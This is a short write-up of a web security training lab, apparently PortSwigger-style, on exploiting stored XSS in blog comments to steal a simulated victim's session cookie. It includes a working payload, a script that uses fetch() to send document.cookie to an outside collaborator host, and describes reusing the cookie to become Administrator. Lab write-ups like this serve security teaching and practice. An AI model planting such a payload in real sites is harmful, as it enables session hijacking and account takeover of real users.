LAB 22 - Exploiting cross-site scripting to steal cookies

Initial instructions

This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's session cookie, then use this cookie to impersonate the victim.

To solve this lab I went to the following website.

XSS Cookie Stealer Payloads

And I took the following XSS cookie stealer.

<script>
fetch(`https://collaborator.net/x`+document.cookie);
</script>

Then I posted the comment and if we go to the collaborator I got the following request.

Here we have the cookies.

To complete the lab lets use them going to /my-account

Refresh and you are Administrator.

Congratulations, you solved the lab!